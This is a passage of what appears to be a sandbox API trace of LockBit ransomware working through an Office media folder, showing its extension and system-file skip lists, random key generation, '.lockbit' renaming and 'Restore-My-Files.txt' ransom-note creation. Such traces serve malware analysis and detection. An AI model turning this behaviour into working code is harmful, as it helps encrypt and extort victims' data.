(lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.359] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9be95800, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcacf0c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9be95800, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x1a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15072_.GIF", cAlternateFileName="")) returned 1 [0209.359] lstrcmpiW (lpString1=".", lpString2="BD15072_.GIF") returned -1 [0209.359] lstrcmpiW (lpString1="..", lpString2="BD15072_.GIF") returned -1 [0209.359] PathFindExtensionW (pszPath="BD15072_.GIF") returned=".GIF" [0209.359] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.359] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.359] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.359] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.360] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.360] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.360] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.360] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.360] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.360] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.360] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.360] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.360] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.360] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.360] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.360] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.362] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.362] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.362] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.362] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.362] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.362] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.362] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15072_.GIF") returned 1 [0209.363] lstrcmpiW (lpString1="ntldr", lpString2="BD15072_.GIF") returned 1 [0209.363] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15072_.GIF") returned 1 [0209.363] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15072_.GIF") returned 1 [0209.363] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15072_.GIF") returned -1 [0209.363] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15072_.GIF") returned 1 [0209.363] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15072_.GIF") returned 1 [0209.363] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.363] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15072_.GIF") returned=".GIF" [0209.363] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.363] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.363] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.364] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.364] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.364] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15072_.GIF.lockbit") returned 76 [0209.364] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15072_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15072_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0209.365] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.365] malloc (_Size=0x40068) returned 0x3df0008 [0209.365] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=423) returned 1 [0209.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.366] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.366] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.366] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.366] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.369] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15072_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15072_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.369] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.369] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0209.369] free (_Block=0x1fa2ed8) [0209.369] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15072_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.369] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.369] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.370] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d1a8500, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcacf0c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9d1a8500, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15073_.GIF", cAlternateFileName="")) returned 1 [0209.370] lstrcmpiW (lpString1=".", lpString2="BD15073_.GIF") returned -1 [0209.370] lstrcmpiW (lpString1="..", lpString2="BD15073_.GIF") returned -1 [0209.370] PathFindExtensionW (pszPath="BD15073_.GIF") returned=".GIF" [0209.370] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.370] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.370] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.371] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15073_.GIF") returned 1 [0209.371] lstrcmpiW (lpString1="ntldr", lpString2="BD15073_.GIF") returned 1 [0209.371] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15073_.GIF") returned 1 [0209.371] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15073_.GIF") returned 1 [0209.371] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15073_.GIF") returned -1 [0209.371] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15073_.GIF") returned 1 [0209.371] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15073_.GIF") returned 1 [0209.371] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.371] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15073_.GIF") returned=".GIF" [0209.371] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.371] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.371] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.371] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.371] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.371] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.371] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.371] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.372] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.372] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.372] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.372] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.372] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.372] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.372] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.372] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.372] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15073_.GIF.lockbit") returned 76 [0209.372] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15073_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15073_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0209.373] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.373] malloc (_Size=0x40068) returned 0x3df0008 [0209.374] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=390) returned 1 [0209.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.374] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.378] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15073_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15073_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.378] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.378] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0209.378] free (_Block=0x1fa2ed8) [0209.378] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15073_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.378] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.378] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab3c1d00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbcaf5220, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xab3c1d00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x115, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15155_.GIF", cAlternateFileName="")) returned 1 [0209.378] lstrcmpiW (lpString1=".", lpString2="BD15155_.GIF") returned -1 [0209.378] lstrcmpiW (lpString1="..", lpString2="BD15155_.GIF") returned -1 [0209.378] PathFindExtensionW (pszPath="BD15155_.GIF") returned=".GIF" [0209.378] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.378] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.378] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.378] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.378] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.378] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.378] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.378] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.378] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.378] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.378] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.378] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.378] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.378] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.378] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.378] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.379] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.379] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.379] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.379] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.379] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.379] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.382] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.382] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.382] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.382] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.382] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.382] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.382] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.382] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.382] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.382] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.382] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15155_.GIF") returned 1 [0209.382] lstrcmpiW (lpString1="ntldr", lpString2="BD15155_.GIF") returned 1 [0209.382] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15155_.GIF") returned 1 [0209.383] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15155_.GIF") returned 1 [0209.383] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15155_.GIF") returned -1 [0209.383] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15155_.GIF") returned 1 [0209.383] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15155_.GIF") returned 1 [0209.383] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.383] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF") returned=".GIF" [0209.383] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".dbc", 